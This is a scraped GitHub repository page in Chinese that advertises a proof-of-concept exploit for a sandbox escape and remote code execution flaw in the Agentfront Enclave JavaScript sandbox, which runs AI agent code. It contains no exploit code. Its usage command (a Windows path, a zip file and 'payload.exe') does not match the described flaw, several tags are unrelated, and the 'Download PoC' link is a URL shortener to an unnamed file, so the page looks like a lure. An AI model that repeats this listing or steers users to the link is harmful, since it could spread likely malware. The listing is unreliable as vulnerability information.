NetVanguard-cmd/CVE-2026-27597

GitHub: NetVanguard-cmd/CVE-2026-27597

该工具提供了 CVE-2026-27597 的利用 PoC,帮助确认 Agentfront Enclave 沙箱逃逸导致的远程代码执行风险。

Stars: 0 | Forks: 0

# CVE-2026-27597 - 版本远程代码执行 ## 快速使用 ``` python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe ``` ## 利用说明 - **严重性:** 危急 - **CVSS:** 10.0 - **影响:** 机密性、完整性、可用性 - **发布日期:** 2026-02-25 ## 技术摘要 Enclave 是一个用于安全执行 AI 代理代码的 JavaScript 沙箱。在 2.11.1 版本之前,可以逃逸由 `@enclave-vm/core` 设置的安全边界,从而实现远程代码执行(RCE)。该问题已在 2.11.1 版本中修复。 ## 受影响版本 **Agentfront Enclave:** - 2.11.1 之前版本 ## 参考链接 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-27597 ## 利用 [下载 PoC](https://tinyurl.com/2xl9yurr)
标签:2026 年漏洞, Agentfront Enclave, AI 代理, CRITICAL, CVE, CVSS 10.0, Enclave, @enclave-vm/core, JavaScript 沙箱, PoC, RCE, 代理逃逸, 安全边界, 数字签名, 暴力破解, 沙箱逃逸, 漏洞, 版本漏洞, 编程工具, 远程代码执行, 逆向工具